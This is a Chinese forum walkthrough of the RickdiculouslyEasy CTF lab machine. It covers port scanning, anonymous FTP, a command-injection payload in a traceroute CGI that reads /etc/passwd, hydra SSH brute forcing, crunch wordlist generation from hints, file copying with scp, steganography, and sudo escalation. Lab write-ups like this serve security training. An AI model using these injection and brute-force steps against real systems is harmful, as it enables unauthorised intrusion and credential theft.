-
-
[原创]RickdiculouslyEasy-CTF挑战
-
发表于: 2021-3-8 21:43 4510
-
RickdiculouslyEasy-CTF挑战
注:请严格遵守网络安全法,本文章以培养网络安全人才为核心。
RickdiculouslyEasy
这个靶机一共有12个flag,一共是130,我们一起来进行这个挑战,看看大家能够拿到多少个flag
信息收集
1 | nmap - A - sV - O - T4 - P - 10.10 . 10.221 |
我们可以看到ftp版本比较的低
尝试匿名登录ftp
1 2 3 | ftp 10.10 . 10.221 #注意密码为空格 get FLAG.txt #使用get命令下载 |
拿到后我们cat查看flag
现在我们拿到了10分
尝试登录ssh
他说SHH关闭???
我们再去看看nmap扫描信息
SHH还标记了问号,他说欢迎访问Ubuntu系统??,因此我们可以判断这个ssh是伪造的,那么我们就绕开它不耽误时间了。
访问80端口
1 | http: / / 10.10 . 10.221 |
发现了一个大头,好像很聪明的样子,得知这个头像名字叫做morty,应该是个动漫人物,感兴趣的朋友可以去看看,那么进来了,我们可以使用robots.txt协议看一下
经过几番尝试,我发现第二个目录可以访问
这个东西我们一会再仔细给大家讲解,不慌,我们再看看其他的几个端口。
访问9090端口
这个端口开启了web服务,我们访问站点看一看
我们又获得了一个flag,得到了第二十分。
nmap13337端口扫描发现flag
观察nmap就发现了这个flag,没有想到居然能够那么容易就又拿到10分。
发现伪装的SSH端口
我们发现这个端口是ssh端口,它进行了伪装
使用nc连接后门
在这里我们可以看到,这里有一个后门,那么我们可以使用nc连接一下
1 | nc 10.10 . 10.221 60000 |
又拿到了一个flag,你欣喜若狂,你以为可以提权直接完事的时候,然而啪啪打脸。
这东西好像除了让你看到flag,其他的什么也干不成!
对站点进行目录扫描
1 | nikto - host http: / / 10.10 . 10.221 |
添加使用目录
1 | http: / / 10.10 . 10.221 / passwords / |
这里我们也看到了一个flag
第二个目录说
哇,莫迪真聪明。将密码存储在一个名为password .html的文件中?这次你真的做到了,莫蒂。至少让我把它们藏起来。我会把它们全删了但我知道你会去找你妈妈。这是我最不需要的
我们看一下它的代码
在这里我们好像发现了它的密码
先把它存在我们的密码字典中,留着准备一会看看能不能进行暴力破解
命令注入漏洞
我们再回到http://10.10.10.221/cgi-bin/tracertool.cgi这个目录
可以看到这个小东西,有路由跟踪的功能。
那么我们可以进行拼接来查看系统信息;这是一个命令注入漏洞。
1 | 127.0 . 0.1 ;cat / etc / passwd |
cat 命令出来一只猫,还真是,cat不就是猫吗,既然不让我们用,那我们用其他的用户来查看系统用户文件
1 | 127.0 . 0.1 ;less / etc / passwd |
1 2 3 | RickSanchez:x: 1000 : 1000 :: / home / RickSanchez: / bin / bash Morty:x: 1001 : 1001 :: / home / Morty: / bin / bash Summer:x: 1002 : 1002 :: / home / Summer: / bin / bash |
在这我们拿到了它的三个用户,我们之前不是在源代码中找到一个密码?那么我们现在可以进行暴力破解了
暴力破解SSH用户
1 | hydra - L user.txt - P passwd.txt 10.10 . 10.221 - s22222 ssh |
使用SSH连接用户
1 2 | ssh - p22222 Summer@ 10.10 . 10.221 # -p 指定端口 |
60分了
看另外两个文件,好像不能够查看,我们使用scp命令将它拷贝到kali中来查看
1 2 3 4 | # scp 安全的远程拷贝工具 scp / home / Morty / journal.txt. zip root@ 10.10 . 10.128 :~ / work / exam / RickdiculouslyEasy scp / home / Morty / Safe_Password.jpg root@ 10.10 . 10.128 :~ / work / exam / RickdiculouslyEasy |
东西拷贝过来了发现居然还要密码,有些让人无奈
而另一个呢是个图片文件
隐写术
- 取证工具(binwalk)
Binwalk是一款快速,易用,用于分析,逆向工程和提取固件映像的工具
另一个图片文件它说是安全的密码,这就涉及到了密码学隐写术了。
我们拿到了压缩包密码,去看看有什么花样
我们拿到了一个价值20分的flag,他说rike告诉他一个天大的秘密,一个安全的密码 safe
我们进入到rike目录下将文件全部拷贝到当前用户
1 2 | cp RICKS_SAFE / safe / home / Summer / cp ThisDoesntContainAnyFlags / NotAFlag.txt / home / Summer / |
这个文件拷贝到远程没有用,ls -l看到safe是个可执行文件,./执行没有作用 他说该死的命令行,后面的那个单词好像是参数,
把之前的数字参数和现在的safe文件连接起来在本地执行,就获得了到了这个flag和提示!
这里面有一些提示我们来看看
1 uppercase character
1 digit
One of the words in my old bands name.� @
社工找到rike以前乐队的名字
The Flesh Curtains
使用给定字符集制作口令字典的工具
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 | 语法: crunch < min - len > < max - len > [<charset string>] [options] crunch 最小长度 最大长度 字符(集) 选项 常用选项: - t #定义输出格式 @代表小写字母 ,代表大写字母 % 代表数字 ^代表符号 * * The Flesh Curtains rike以前的乐队 * * 口令: 大写字母( 26 英文字母) 数字 乐队当中的一个单词 crunch 5 5 - t , % The > rike - pass .txt crunch 7 7 - t , % Flesh >> rike - pass .txt crunch 10 10 - t , % Curtains >>rike - pass .txt |
将字典做好后便可进行暴力破解
使用hydir进行暴力破解
1 | hydra - l RickSanchez - P rike - pass .txt ssh: / / 10.10 . 10.221 : 22222 |
使用SSH登录用户
1 2 3 | ssh - p 22222 RickSanchez@ 10.10 . 10.221 sudo su #使用sudo提权 |
然后我们就拿到了130分,这章靶机完结不知道大家没有什么收获哈哈哈
[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课
赞赏
- [原创]CSRF漏洞原理及测试方法总结 1206
- [原创]RickdiculouslyEasy-CTF挑战 4511
- [原创]小蜘蛛带你一起学习DC-7 4299
- [原创]小蜘蛛带你一起学习DC-6 4618
- [原创]小蜘蛛带你一起学习DC-5 5018